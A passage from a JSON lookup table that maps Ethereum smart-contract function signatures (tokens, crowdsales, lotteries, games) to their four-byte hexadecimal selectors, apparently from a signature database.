"DayTrader()": "0x7393e0b2", "epcwallet(address)": "0x4476e9a9", "EthPyramid()": "0x8d688b6e", "CPCCrowdsale()": "0x193118fa", "ElevenElevenToken()": "0xe8787040", "_getActiveMessageId()": "0x98d0573e", "_saveMessage(uint256,uint256,address,string)": "0x76dc97d9", "setMessageSpan(uint16)": "0x46143a39", "calculateDuration(uint256)": "0x81dafe0e", "getQueueOpening()": "0xe32ae93b", "getActiveMessage()": "0x4f0f539e", "Billboard()": "0x8dc98851", "getFileAt(uint256)": "0x6c5dee17", "abortByBroker()": "0x980fb0aa", "deleteDocument(uint256)": "0xa0fb1497", "addDocument(bytes32,string,string)": "0x8d69121d", "setSeller(address,address)": "0xb7107d00", "setBrokerFee(uint256)": "0x62d93527", "setBroker(address,address)": "0xbe4951e4", "getBroker()": "0xd1314ee0", "createOrSet(string,uint256,string)": "0xb2774b17", "joinAsBroker()": "0xe94087d6", "joinAsBuyer()": "0x9f33d9cb", "Broker(bool,address,address)": "0x06aacb14", "createContract(bool,string)": "0x52f97117", "TravelWithMeToken()": "0x993eaefa", "ICOCappedRefundableCrowdsale(uint256,uint256,uint256,address,address)": "0x95b7c348", "createBountyToken(address,uint256)": "0xf1a63733", "ICOCrowdsale(uint256,uint256,address,address)": "0xf4ec593d", "ICOToken()": "0x6e40975d", "Decabes()": "0x01788d1d", "Gentingchain(uint256,string,string)": "0xc5e35f42", "deleteFromWhiteList(address,address)": "0xc469eb99", "addToWhiteList(address,address)": "0x1605750d", "_tokensToEthereum(uint256)": "0xda06d96c", "_sqrt(uint256)": "0x6a263f02", "_rewardLotteryWinners(uint256,uint256)": "0x905b7256", "_ethereumToTokens(uint256)": "0xa0ac47fe", "_createLottery()": "0x63cd1c51", "setAmbassador(address)": "0x553b6975", "invokeLottery()": "0x4daf890a", "getUserDividends(address)": "0x040a772e", "getReferralBalance(address)": "0xb5b86a51", "fund(address)": "0x23024408", "disableAmbassadorMode()": "0xeb4b41b2", "MALCoin(uint256,string,string)": "0xf95a77e5", "Moon()": "0xc61fb3f1", "CRYPTODUBAI()": "0xcddbff7c", "CrowdsaleStoneToken()": "0xb6bbafa2", "StoneToken()": "0xe40c231e", "finishPREICO()": "0x23c2b4ea", "openClosedToken()": "0xe45b1d1b", "showMoneyTransfer(uint256)": "0x6186b3e3", "transferMoneyForTaskSolutions(string,uint256)": "0xcc32f8ad", "isReserved(address)": "0x57c3f997", "toReserved(address,uint256)": "0x240c2709", "fromOtherCurrencies(uint256,address)": "0x2f0160e7", "correctPreICOPeriod(uint256)": "0x34757fa9", "statusICO()": "0xa158e377", "setCurrency(uint256)": "0xdcc23730", "OwnerRecall(address,uint256)": "0x011ce353", "ApproveAndtransfer(address,uint256)": "0x7f0cd33c", "MintToOwner(uint256)": "0x2a1eb7cc", "BitClemm()": "0xc22598d2", "checkZeroValue(uint256)": "0xd77fc50f", "addVesting(address[],uint256[],uint256[])": "0x6c9e89b6", "SafeDiv(uint256,uint256)": "0x9678eb05", "getTotalBattleboards()": "0x9e776ff5", "getMonsters(uint16)": "0xfa70466e", "getNumTeams(uint16,uint8)": "0x6390f519", "getTurn(uint16)": "0x89b2df31", "angelOnBattleboards(uint64)": "0xb6282d0d", "getNumTilesFromBoard(uint16)": "0x653a8f14", "getLastMoveTime(uint16)": "0x8957f8bf", "isTileLive(uint16,uint8)": "0x4b2f249a", "isBattleboardLive(uint16)": "0xfa712f71", "getBattleboard(uint16)": "0x3d561f73", "getPositionFromBattleboard(uint16,uint8)": "0xe305c210", "getTileIDbyPosition(uint16,uint8)": "0xb3ab715e", "getOwner(uint16,uint8,uint8)": "0x9e79800d", "getPetbyTileId(uint16,uint8)": "0xff069b4c", "getTileIDByOwner(uint16,address)": "0x8e894a6f", "getTileFromBattleboard(uint16,uint8)": "0x0065d700", "getBarrierNum(uint16)": "0xa21eef95", "getMaxFreeTeams()": "0x76b1514f", "getTeam(uint16,uint8)": "0x6eae0843", "getMedalsBurned(uint16)": "0xa4d28b62", "getTileHp(uint16,uint8)": "0xf345d06b", "clearAngelsFromBoard(uint16)": "0x6b9168e6", "killBoard(uint16)": "0x3c816217", "iterateTurn(uint16)": "0xadc38b2f", "setLastMoveTime(uint16)": "0x18d30bfa", "addMedalBurned(uint16)": "0x11c1ddd9", "setTileHp(uint16,uint8,uint32)": "0x8841937a", "setTilePosition(uint16,uint8,uint8)": "0x9b8f5d4a", "addTeamtoBoard(uint16,address,uint8)": "0x8b93509f", "killTile(uint16,uint8)": "0x8a2ae2ab", "createTile(uint16,uint8,uint8,uint8,uint32,uint16,uint64,uint64,address,uint8)": "0xafcd565c", "createNullTile(uint16)": "0xee8f31c3", "killMonster(uint16,uint8)": "0x81e7a97e", "createBattleboard(uint256,uint8)": "0x77d99ef5", "AnetCoin()": "0x470b1f7c", "BetOnMe()": "0x05a9cec2", "TunDrMahathirMohammad()": "0x682677e8", "modifyairdrop(uint256,uint256)": "0xe0c012ff", "redeemPackage(uint256,address,uint256,bytes32[])": "0x3289e004", "redeemed(uint256)": "0x7ed0f1c1", "AirDropToken(string,string,uint8,bytes32,uint256)": "0x64d9a9e9", "getShareholder(uint256)": "0x6ccb5d02", "totalShareholders()": "0x0f8d4030", "shareholdersBalance()": "0x97a629aa", "Multibot()": "0x4a1ba4ba", "Arascacoin(uint256,string,string)": "0xfbc53c8e", "setData_1(uint256)": "0x81824d53", "Etats_financiers_10111011()": "0x7061e777", "applicationNameHashTaken(bytes32,bool)": "0x1eed0347", "userNameHashTaken(bytes32)": "0xfdb39c40", "_userSignUp(string,address,bool)": "0xb8b199e5", "isSigned(address,address,bytes32,uint8,bytes32,bytes32)": "0x198fa9a3", "getUserByName(string)": "0x4bff5009", "applicationNameTaken(string)": "0xbf1c30f5", "userNameTaken(string)": "0xd35e656b", "setHydroStakingMinimum(uint256)": "0x3a4c11b0", "setHydroContractAddress(address)": "0x5f373c22", "setUnofficialApplicationSignUpFee(uint256)": "0x62d1dac2", "setUnofficialUserSignUpFee(uint256)": "0x85903f67", "deleteApplication(string,bool)": "0x1e41be58", "unofficialApplicationSignUp(string)": "0x7e90819a", "officialApplicationSignUp(string)": "0xa56226ef", "deleteUser(string)": "0xd3695161", "deleteUserForUser(string,uint8,bytes32,bytes32)": "0xa56024d8", "unofficialUserSignUp(string)": "0xcc2fd120", "officialUserSignUp(string,address)": "0xce203b83", "withdrawERC20Token(address,address)": "0xecfbe70c", "getBullsmasterReq()": "0x23b0bbea", "getMyBulls()": "0xa0996799", "getFreeBulls()": "0x0a298034", "becomeBullsmaster()": "0x2e18d8a9", "BullsFarmer()": "0x5936259c", "ownersTransfer(address,uint256)": "0xccda696b", "PAXToken(bool)": "0x96419497", "HotLove()": "0x2f92b151", "MANHATTANPROXY2NDAVE()": "0x8c3d5897", "end_auction()": "0xbd865d29", "withdraw_badge()": "0xa94510ca", "withdraw_ether()": "0x79061e96", "DGDb_Auction(address,address,address,address,uint256)": "0xf9618364", "addLockTokenAllocation(address,uint256)": "0x8bc05808", "checkBalanceTier(address)": "0xfa779bd6", "REBToken()": "0x03a68d1d", "NewtonTree()": "0x5ba17b2d", "XtremCoin()": "0x59092c29", "POKCC()": "0x9bb8b563", "BOXIcoin()": "0x9725b4a5", "collectAll(uint8)": "0xf9c12dda", "collectFor(address)": "0x349ae23b", "GTL()": "0x06c15206", "issue(uint256,uint256,address[],uint256[])": "0x86e4993c", "behalfBet(address,uint256,uint256)": "0x32af5858", "betMatch(uint256,uint256)": "0x2a9fabd2", "setBehalfer(address)": "0x0894bdf2", "WeMediaChainToken()": "0x68e1f526", "SPINToken(address,address,uint256,uint256)": "0x601ee75e", "LATokenMinter(address,address)": "0x3677b5f2", "changeTeamPoolForFrozenTokens(address)": "0xdd0702d6", "changeTeamPoolInstant(address)": "0xeef0ef1e", "changeHelper(address)": "0xf3edf112", "fundTeamInstant()": "0x2104c2bb", "ExchangeContract(address,address,uint256,uint256)": "0xd1f6d676", "changeCourse(uint256,uint256)": "0x48b59dd6", "LATToken()": "0xe5d0c1bd", "changeExchanger(address)": "0xa3893a33", "miningTen()": "0xcc4bf6a3", "miningFive()": "0x00cb527f", "miningThree()": "0xec91b550", "miningOne()": "0xb3f17c20", "miningOneSelf()": "0xc16c0851", "miningOneFree()": "0x9714a27c", "_transferHelper(uint256)": "0x7e93150b", "ActionMining(address,uint16)": "0xa0da3236", "getMyCrocs()": "0xec704095", "getFreeCrocs()": "0xe155999e", "CrocsFarmer()": "0x6f0d0a38", "MOREToken()": "0xf6dbc252", "withdrawRefunds()": "0x95afc05c", "splitProfit(uint256)": "0xe1e85c4b", "confirmRequest(uint256)": "0xa6b2c437", "createPercentageRequest(uint256)": "0x5d8f3b76", "createFiatInvestorRequest(uint256)": "0x7c83fdf7", "removeEthInvestorRequest(uint256)": "0xee3a5075", "createEthInvestorRequest(uint256)": "0xa4a1485b", "createTreatyRequest(uint8,string,uint256)": "0xd1a75fea", "initCreator(uint256)": "0x763091ff", "SafeNetToken(uint256)": "0x789dfc91", "erc20ECHT(uint8)": "0xb66a94ef", "MERIDIANERC20(string,string)": "0x1cb08889", "TokenOWLProxy(address)": "0x06c4811e", "Proxy(address)": "0x0070c3b3", "BITOToken()": "0x65e44d06", "GREENECO()": "0x72490c69", "Poge(uint256,string,string)": "0x16815137", "NauticusToken()": "0x48e278f9", "toggleTransfer(bool)": "0x12a187f3", "Permission()": "0x0326be45", "stoppCrowdsale(uint256)": "0x1240adc8", "InitAssignCTC()": "0x5a0646e2", "InitAssignOK()": "0x8ef53edf", "Vote(address,bool)": "0xa635d31e", "GetDislikeCount()": "0xadb6e8f5", "GetLikeCount()": "0xb22175db", "PizzaPoll()": "0xdbd3313e", "discountedMiningDifficulty(address)": "0xbbfbe6b6", "discountedMiningTarget(address)": "0x185a6284", "PoWAdvCoinToken()": "0x6c963fc7", "META()": "0x17b4c4d3", "HPCToken()": "0x133d10e6", "marginCall()": "0xd75352e1", "getBNTBalance(address)": "0x65483f69", "getETHBalance(address)": "0x3bb66a7b", "getReturn()": "0x159ce057", "moo()": "0x63cd99cb", "closeLong()": "0x24f82526", "getSellReturn(uint256)": "0xa5a9ba8d", "getBuyReturn(uint256)": "0x1111cd24", "long()": "0x07bfce37", "MarginBanc()": "0x193e6679", "massNotify(address[])": "0x0e6848cc", "setSaleBonus(address,address,uint256)": "0xa2dee527", "EthealPromoToken(address)": "0x0f0ed39e", "extractTokens(address,address)": "0xed6b2d7d", "depositOffchain(address,uint256,uint256)": "0x9e1e60c7", "scheduleFight()": "0xd868c718", "getOraclizePrice()": "0x8f6f6115", "setGasPrice(uint256,uint256,uint256)": "0x389cd1ae", "GladiethersOraclize()": "0x35f21f0a", "bonus(uint256,address[],address,uint256[])": "0xa427c5d9", "release(address[],address,uint256[])": "0xf07227dc", "send(address,uint256,uint256,uint256)": "0x2ef140ef", "distribute(address,uint256,uint256,address[],address,uint256[])": "0x88631e18", "issue(address,uint256,uint256)": "0xdfe5ef48", "setArtEsc(string,string)": "0x91c20375", "setArtEvt(string,string)": "0xd02d518d", "setArtIdt(string,string)": "0xd813b4b9", "getArt(string)": "0x6e6b4bed", "newArt(string,string)": "0x7783c06b", "setSysAcc(address)": "0x4150f4cd", "setParter(address,uint256,uint256)": "0xb34362be", "CXTCContract()": "0x76db9b14", "frozenBalanceOf(address)": "0xbe91de53", "freeBalanceOf(address)": "0x543e9954", "GRETToken()": "0xeecb4a65", "FCCPlaceHolder(address,address,address)": "0x90ee2ec2", "issueTokenToAddress(address,uint256,uint256)": "0x8c8f9c0e", "changeRatio(uint256,uint256)": "0x4d1387b4", "FCCContribution()": "0x1c59c177", "AUACoin()": "0xb97b9df8", "releaseTimeLock(address)": "0xbaf8809b", "autoUnlock(address)": "0xe20bc67b", "distributeWithLockup(address,uint256,uint256,uint256)": "0xd3e8b207", "showLockState(address)": "0x625becbc", "unlock(address)": "0x2f6c493c", "lock(address,uint256,uint256,uint256)": "0xc97be180", "timeoutResolve(bytes32,uint256)": "0xb6f9fda5", "periodICOStage4()": "0x0a518754", "myWeiValue()": "0xb8b8d387", "toBeDistributed()": "0xcc5b542e", "privateAllocated()": "0x8e2a37b2", "FOMOed()": "0xfad9100c", "topTotalSupply()": "0x85c09f26", "HardCapEthereum()": "0x7ef26d42", "setTrading()": "0x7c519ffb", "ICOstarttime()": "0x64f1873b", "inCirculation()": "0xe5a93dd8", "window2StartTime()": "0x139654e0", "FIXED_RATE()": "0x7f5a259f", "stdBalance()": "0x7ecfb675", "MIN_INVESTMENT()": "0x4ef8ff33", "saleStartFirstDayEnd()": "0x4b3a5fa6", "FSNASAddress()": "0x6f5d64fa", "reward7()": "0x6ae22740", "endThirdBonus()": "0xe58dd55a", "isMaintaining()": "0xee4e4416", "minimumEther()": "0x65e23ce3", "_minAmount()": "0x064d4d7c", "bigId()": "0x0806506e", "ethereumSaleRate()": "0x038e666f", "referrerEarnings_()": "0xfe399121", "capReleaseTimestamp()": "0x7ec2fd36", "MonthsProfit()": "0x1b27ca21", "getChecksumPairCount()": "0xd6f22e69", "LOCKUP_3M_ICO_TIMESTAMP()": "0xccc54d69", "phrase()": "0xf4b43268", "tokenIcoUsdCentPrice()": "0x459c7d0b", "rvDeposit()": "0x8d24d147", "contractCreationBlockNumber()": "0xa3721adc", "saleStartEpoch()": "0x7c4aa44c", "TOKEN_SHARE_OF_LEGALS()": "0xcddce877", "smbl()": "0xcb4e75bb", "PRESALE_START_WEEK3()": "0x8d01308c", "mintedPercentOfTokens()": "0x48889813", "countConfirmed()": "0xedd6fb16", "typeToken()": "0xac5d2dbf", "CANCELLATION_FEE()": "0x78b17ccf", "thirdTokenExchangeRate()": "0xb5e1fe13", "is_btc()": "0xa6ecfff8", "Bitcoin_address()": "0x092626a7", "appNickname()": "0xbff5fb64", "STATUS_NO_DEAL()": "0x30e9f6ed", "sumHardCapICO2()": "0x0e46695e", "PRE_ICO_BONUS_TIME_2()": "0xab3cdaf0", "approveTransferableToggle()": "0x40c3b18e", "bountiesWallet()": "0x51576510", "returnChametz()": "0x2cea53bd", "roundSetUp()": "0x631b3672", "nstDeposit()": "0xbe78632e", "m_totalAppCount()": "0x5476f49d", "hardCapTokens()": "0x4b749535", "sumICOStage6()": "0x3d8e1b7c", "OTHERCRUISER_FTL_SPEED()": "0x5a95edd9", "certificate()": "0x2dbf7b98", "MID_GRADE_CATEGORY()": "0x35fe3660", "avgRate()": "0x838c63b7", "AdminSupply()": "0x69a4c408", "indFundDeposit()": "0x3645ebfb", "battleContractAddressCanBeUpdated()": "0xdfb8c6c2", "PRESALE_PERCENTAGE_5()": "0x94c0f3e2", "TOKEN_CONTROLLER_INTERFACE()": "0xf1898fda", "secondAllocation()": "0x473bca32", "presaleMarket()": "0x1d5b26b1", "withdrawedFoundationCounter()": "0xd432a885", "foundationAsset()": "0xccca237c", "alias_price()": "0xe5f3fcb1", "nft()": "0x47ccca02", "incentiveTokenAddress()": "0x20263e87", "MAIN_SALE_END_TIME()": "0x665d8a53", "priceBeforeGoalReached()": "0x872dd84b", "crowdSaleEnabled()": "0x48cfc6c6", "maxRevealSeconds()": "0x4cc0a885", "crowdsaleDuration()": "0x7228becb", "setBounty()": "0x6dbe21b8", "PUBLIC_RESERVED()": "0x8be4886c", "teamETHUnlock2()": "0x508d60aa", "currentSaleDay()": "0x5a9f97d1", "getApprovedProxies()": "0x81f5f75c", "jackpotBlance()": "0x25db4dd0", "priceForSaleAdvertisement()": "0x9fc20f60", "previousPayoutBlock()": "0x070c3c23", "advisorsReleased()": "0x44ae0567", "sendCount()": "0x6ed65dae", "SALE1_RATE()": "0x78e24ab5", "crowdsaleAddr()": "0xb673a75c", "exploreFastenEMONTFee()": "0x1a389eb9", "ENS_SUB_APP_NAME()": "0x231cb6ab", "returnFundsForAll()": "0xccdfcfa4", "maxChildCount()": "0x2cf5fe89", "_balance()": "0x56c4e05a", "toNext()": "0xfe5675cc", "finalUnpaused()": "0xff01f11a", "stage_2_add()": "0x62464576", "maxPremium()": "0x51b79d55", "time_of_token_swap_start()": "0x59b350fb", "teamVestingAddress()": "0x3541fe94", "timeRemaining()": "0xe3cfef60", "setTokenAdd(address)": "0x3ca6c07a", "changeSecOwner(address)": "0xbf5671fd", "InsureShares()": "0x1cfb4e1b", "Nicks()": "0xcfe2f4e2", "PreSaleBuy(address)": "0xcaeb2539", "PrivateSaleBuy(address)": "0x16fc68cb", "RefCommission(uint256,uint256)": "0xbb1b21ed", "IncMainSupply(uint256)": "0xf38a6163", "IncPreSupply(uint256)": "0x0eb40426", "IncPrivateSupply(uint256)": "0x527f0900", "AddPromoter(address)": "0xe4b5553c", "ConfigPromoter(uint256)": "0x2174dcec", "GetCommission()": "0x58712633", "GeneralUpdate(uint256,uint256,uint256)": "0x5884f2f5", "DIGTREX()": "0x17753c44", "winnerList()": "0x15d6af8f", "playJackpot()": "0xc1ac7902", "removeCountry(uint256)": "0xc2febef5", "installWinner(uint256)": "0x2eafc2aa", "giveBalance(uint256,uint256,uint256)": "0x34ad1e53", "WorldBetToken()": "0x7563c81f", "issueTokenToAddress(address,uint256)": "0x8e9bf09c", "setRatio(uint256)": "0xb2237ba3", "setMaxEth(uint256)": "0x42226e02", "initialize(address,address,uint256,uint256,address,uint256)": "0x54812d17", "PFCCContribution()": "0x0888ad41", "CheToken()": "0x105b2645", "decExchangeBalanceOf(address,uint256)": "0xafa5e56a", "exchangeBalanceOf(address)": "0x40cde403", "sendTokensToExchange(uint256)": "0x41a1d66c", "getTokensFromExchange(address,uint256)": "0x457ce032", "moveTokensFromStockToSale(uint256)": "0x919203a0", "moveTokensFromStockToExchange(uint256)": "0xfa9ce7e7", "moveTokensFromSaleToCirculating(address,uint256)": "0xa870ddc2", "moveTokensFromSaleToExchange(uint256)": "0x1991d6ac", "setExchangeCommissionAddress(address)": "0x6095c2d5", "setBbAddress(string)": "0x20b4fc29", "howMuchTokensAvailableForExchangeFromStock()": "0xdaa6f417", "getBbAddress(address)": "0x3902b9fc", "NbtToken()": "0xa17e463c", "COZE()": "0x14eda32c", "PriIcoSale2(address,uint256,uint256,address,address)": "0x684b49f5", "MaxToken(uint256,string,string)": "0x8675cf9e", "endSale(bool)": "0xdc646367", "changeStart(uint256)": "0xd1d5190c", "howMany(uint256,uint256)": "0x6e942390", "SignalsCrowdsale(address,address,address,address)": "0xcd501bf7", "swapFor(address)": "0x801a1467", "PresalePool(address,address,address,uint256,uint256)": "0x8beb1af1", "approve(address,uint8,uint8)": "0x12f7cf74", "getBonuses(address)": "0x8e3047d9", "approved(address)": "0xd8b964e6", "approve(address,uint8)": "0x4342e966", "CompanyReserve(address,address)": "0x1806be68", "allocToMember(address,uint256)": "0xd707d466", "CommunityPool(address,address)": "0x6b17864f", "initiate()": "0x66aa56c5", "AdvisoryPool(address,address)": "0x5714db23", "AdviserTimeLock(address,address)": "0x39e028ba", "SpectrumNetwork()": "0x3329578b", "getJockey(uint256)": "0x3b4719d0", "createJockey(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0x09d74cc5", "setSaleFee(uint256)": "0xbdcafc55", "jockeyPr(uint256)": "0x4e8ec73e", "jockeyFS(uint256)": "0xc603ae14", "jockeyNotForSale(uint256)": "0x04b69fa0", "jockeyForSale(uint256,uint256)": "0x4639888b", "_newJockey(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address)": "0xebf522b8", "_sell(address,uint256,uint256)": "0xcfd56a13", "retrieve(address,address,uint256)": "0x28c4e24c", "CryptoFinexToken()": "0x0f710e32", "FondoNetwork()": "0x60173ede", "checkNumber(address)": "0xf1f76438", "LuckyNumberService()": "0xd06cdc73", "AT()": "0xe7a83c74", "splice(uint8[],uint256,uint256)": "0xffbd6f72", "setMilestone(uint256)": "0xc547092b", "setMinDonation(uint256)": "0x83a6595f", "checkMidiNotesValue(uint8[])": "0xd63124d7", "checkMidiNoteValue(uint8)": "0xd303e3b2", "transferMilestone()": "0x091b3e6d", "getDonatee()": "0x7a32c84c", "getTotalDonated()": "0xd56e3068", "getDonationStats()": "0xb0780bd8", "getBeat(uint256)": "0x15f92e3b", "getNumberOfBeats()": "0x97b1ff1d", "checkGoal(address)": "0x066bf18c", "SheetMusic(address)": "0x81d38f2d", "distributes(uint256)": "0x9ca5454e", "setDTR(address)": "0x91977c56", "MUNIRAHAMID()": "0x05c54cd6", "manual_lottery(bytes32)": "0x4f01d77e", "play(bytes1,bytes1)": "0x97028899", "ETHLottery(address,uint256,uint256,uint256,address)": "0x2027d2c6", "accumulate()": "0xa53aeb4e", "GeneBTC()": "0xa8e81844", "updateConvertionRate(uint256)": "0x4ac9fc37", "_buyTokens(address,uint256,uint8)": "0x745f2860", "coupon(uint256,uint8,uint8,bytes32,bytes32)": "0x5ec5bed6", "PersonalTime(address,uint256)": "0xaf164016", "bankerBeginTime()": "0xe92d5178", "STATE_DONATION_ROUND_2()": "0x8b90a378", "TimeLock()": "0xbb76d8a5", "philadelphiaBets()": "0x8f9a42b8", "systemAuctionDuration()": "0x0337aa74", "lastGateway()": "0x93ac3905", "interestRatePerCycle()": "0x52279295", "startICO_w2()": "0xb7663b08", "last50plusblocknr()": "0xba816496", "zGetGameBalance()": "0x1839babf", "grantVestedEDEXContract()": "0xd937ed44", "deathData_v10()": "0xb92a56bf", "setFirstLogEntry()": "0x086fb1f8", "tokenDistributeInDividend()": "0x75fda973", "getPercentBurn()": "0xbdf1211e", "tokenGenerationMin()": "0x6712e0be", "uncirculatedSupplyCount()": "0x41ef6bb7", "resetNewTokens()": "0xca8695a4", "gameAddress()": "0xa168d873", "RISK()": "0x9c2062ad", "adPriceHour()": "0xfc1a142d", "isMonsterChampionship()": "0x57da1fb2", "icoCrowdsaleContract()": "0xaedf5360", "MAX_HOST_PERCENT()": "0x2ae4b85f", "buy20Price()": "0xbe754ba4", "_batch1_rate()": "0x139b3752", "arbitratorExtraData()": "0x0c7ac7b6", "mininumPurchaseTokenQuantity()": "0x50eebaf7", "endMark()": "0x1ea8b099", "admin3()": "0x1de46a78", "totalSaleAmount()": "0x814e5c9b", "OVERALLSOLD()": "0x39fdf2fd", "summFounders4()": "0x0240db33", "saleDeadline()": "0x888ea120", "wingsTokenRewardsPercent()": "0xbd11e933", "Soft_Cap()": "0x4c977972", "getNumDividends()": "0x52d23633", "getCurrentImpeachmentUrlDetails()": "0x7e754146", "resumeSwap()": "0xf0e769dc", "burnTimeChange()": "0xea9b6025", "shortShare()": "0xb7159185", "poolPercentage()": "0x3e7e30ba", "etherPaid()": "0xc257eabb", "refundingStarttime()": "0xbda330f7", "requestedForMigrationAt()": "0xe25f0a98", "RATE_ETH_TXK()": "0x68f269b4", "init1_block_height()": "0x02a3036d", "tokenSaleMin()": "0xd873f0d6", "ARCD_FUND()": "0xf7f15304", "ethUSD()": "0xac48bd5a", "PRECISION()": "0xaaf5eb68", "joinedCrowdsalesLenMax()": "0x8507bee8", "persistLimit()": "0x1fe51f82", "hourPotLeader()": "0x7b563e3a", "bonusInPreSalePhase2()": "0x3e85755a", "fundingStartTimestamp()": "0xe34f2a9e", "RewardPoolAddress()": "0x9e9593ce", "withdrawRestOfBalance()": "0xec3f5d62", "rand_num()": "0x678892c0", "prPool()": "0x9ab9ee73", "startMark()": "0xed95f52b", "current_price_atto_tokens_per_wei()": "0x37a30d3b", "team0Points()": "0xc5179027", "Initial_Supply()": "0x7bc14a67", "managementLocked()": "0xa50776dd", "totalAssetTokens()": "0x8f00f49b", "ETH_USD_EXCHANGE_RATE_IN_CENTS()": "0xcf9a60d4", "surveyEndAt()": "0x410da27d", "_allowBuyDirect()": "0xf36a1fd9", "ChangePeriod()": "0x002dc7f1", "setStepFunctions()": "0xfca981f6", "thirdWeekBonusInWeek()": "0x1b6e37ee", "tokenBearer()": "0x8f1d90b1", "dollarRaised()": "0x73980d69", "curPosition()": "0x9fa987d5", "withdrawManagerBonus()": "0x4b089b12", "USERS_address()": "0x419ab31e", "owner_bonusSend()": "0x0e7ce976", "hodlerTotalValue()": "0x91e79c72", "sendInvestorIndex()": "0xec76312a", "supplyLeftAtOrigin()": "0x475fd055", "_v3()": "0x8be3a897", "lastSaleTimestamp()": "0xf5c217da", "EarlyAdoptersAmount()": "0x20153d38", "availableEarlyPlayerShares()": "0x77c4fd07", "faythe()": "0xfe95112c", "api()": "0xd2c18e0b", "totalClaims()": "0x41c61383", "badgerWallet()": "0x4806249e", "hedgeAddress()": "0x8fedc959", "closedRound()": "0xf0c0546c", "actualPriceInCents()": "0x5954ee54", "increaseStep()": "0x783110dc", "airDropPool_()": "0x1a2b4cd8", "refundOpen()": "0x74c1b1c9", "priceStar4()": "0x6882d481", "investStart()": "0xa367d99a", "totalDividendShares()": "0xc64fa2e4", "TOTAL_REQUEST_TOKEN_SUPPLY()": "0x5e23464e", "lastCountAddress()": "0x8b9efe2d", "setHost(string)": "0xa5ab89ff", "hexToAscii(uint8)": "0x4e5146a9", "getSecondHexByte(bytes1)": "0xf35c172e", "getFirstHexByte(bytes1)": "0xefb23d73", "toHexString(bytes32)": "0xedb961ff", "argl(uint256,uint256)": "0x0f861127", "replaceProduct(address,address,address,address)": "0xb91c771f", "setItoEndTime(uint256)": "0x72baa779", "FootStarCrowdsale()": "0x12c24128", "ownerSetCanBurn(bool)": "0x00ac77a0", "YourtekToken()": "0x437c58a8", "PauseOff(uint256)": "0x9784696c", "PauseOn(uint256)": "0x92682b5f", "ChangeEmissionRateCoefficient(uint256)": "0xef43a2b8", "ChangeEmissionGrowthCoefficient(uint256)": "0xb57228fd", "ChangeEmissionSumm(uint256)": "0x433503f6", "ChangeEmissionRate(uint256)": "0x8847df97", "Thankfulness()": "0xab9d8e4b", "getWhitelistByIndex(uint256,address)": "0x407255b5", "deploy(address)": "0x4c96a389", "Mydo()": "0x3956e963", "getRecordNameToken(bytes32)": "0x699487c2", "signArchive(bytes32,string,string)": "0xa45d82bd", "KockToken()": "0x4d8e15f2", "SundayFundayToken()": "0x4f4f23ef", "TechnoBit()": "0x9083998b", "Division(uint256,uint256)": "0x407787e6", "Multiplication(uint256,uint256)": "0xe16dbb2f", "SendmoneyCall(uint256)": "0xcc75cc9b", "SendmoneyTransfer(uint256)": "0x667390c7", "SendmoneySend(uint256)": "0xe6c2f4fe", "FiveBalanceToken()": "0x61b7d7f4", "DEWCOIN()": "0x34a9918e", "add(uint256,string)": "0x7230bce8", "getFilesCount()": "0xa3322a12", "adjustValue()": "0x01b07f75", "ERC777DemoToken(string,string,uint256)": "0x6499e2d9", "createMarketItem(bytes16,bytes16[],bytes16[],uint256[])": "0x2196feac", "createBet(bytes16,bytes16,bytes16,bytes16,uint256,uint256)": "0x8253adf1", "getArrayHashLibry(bytes16)": "0x48bd64c0", "getWinOutcome(bytes16)": "0x58cea888", "getInfoMarketItem(bytes16)": "0x631ccb1d", "closeBets(bytes16,bytes16,uint256,uint256)": "0x475297bc", "closeBetsIfEventNotSuccess(bytes16,bytes16,uint256,uint256)": "0x9212d0c1", "cancelEvent(bytes16)": "0x714d9537", "recordingResultsOfBet(bytes16,bytes16[],uint8[])": "0xc704e04a", "acceptBet(bytes16,bytes16,bytes16,bool)": "0x9be6178e", "cancelBet(bytes16)": "0xad27b14d", "createBetAcrossDeposit(bytes16,bytes16,bytes16,bytes16,uint256,uint256)": "0xd3528d9b", "addMarketItem(bytes16,bytes16,bytes16[])": "0xfd40a1e9", "createEvent(bytes16,bytes16[],bytes16[],uint256[])": "0xefc3323c", "setNextSmartContract(address)": "0xf068a3a6", "changeStatusModerator(address,bool)": "0x76b15836", "withdrawLiquidatePool(uint256)": "0xdf28aef7", "depositLiquidateThePool(uint256)": "0x64c877f1", "withdrawTokenForUser(uint256)": "0x551e44ca", "registerBarcode(bytes9,string,string,string,string,string,string)": "0x1bb5f0a2", "transferFundsTokens(address,address,uint256)": "0xfb1d9eea", "getBalanceOfAccount(address)": "0x936710bf", "getFreeTokensAmountOfUser(address)": "0xd68a9fb8", "sendFreeTokens(address,uint256)": "0xd361ab64", "QuantaloopToken()": "0x0b80b4f9", "getCreatorReward()": "0xe17fe6a0", "checkEndOfChallenge()": "0x4d85b8d0", "voteForCandidate(uint256)": "0x36c8c5ee", "VotingChallenge()": "0xcec3638d", "CBXToken()": "0xbcf711b2", "toWei(address,address,uint256)": "0x2214f65d", "fromWei(address,address,uint256)": "0xd6bc1e57", "calcZWCAmountByToken(address,address,uint256)": "0xe76240a4", "isDailyUplimitReach(address,address,uint256)": "0xb44ed831", "ExchangeTokenToZWC(address,address,uint256)": "0x32331418", "TokenSwitch(address,address,bool)": "0x4b2702b3", "UpdateTokenDailyExchangeAmount(address,address,uint256)": "0x7c6e19a8", "UpdateTokenRate(address,address,uint256)": "0xa9e4d6ce", "AddToken(address,address,uint256,bool,uint256)": "0x39d428ea", "ExchangeSwitch(bool)": "0xc9dbc259", "TransferToken(address,address,address,address,uint256)": "0xf8887cd3", "WeiN()": "0x3b709e8d", "deploy(string,string,uint8,string,address)": "0xd37b8a96", "_isValidSignatureAndData(address,address,bytes)": "0xc15d15da", "_isValidSignatureAndMethod(address,address,bytes)": "0x5d281384", "_isValidSignature(address,address,bytes)": "0x193237f5", "isBouncer(address)": "0x4c4d07e7", "_removeRole(address,string)": "0x802114a8", "_addRole(address,string)": "0x5a2a4452", "IxiniumFT()": "0xbd8e4725", "NodeSwapCrowdSale(uint256,uint256,uint256,uint256,uint256,address,address,address,address,address,uint256)": "0xbd5ae945", "TECHNOBITToken()": "0xad24d512", "FOToken()": "0x0242ba2a", "advertise(address)": "0x4063d563", "updateVIPBoard()": "0xe52eb764", "processDividends()": "0x7bf5b04b", "payoutWithFee(uint256)": "0x630bae99", 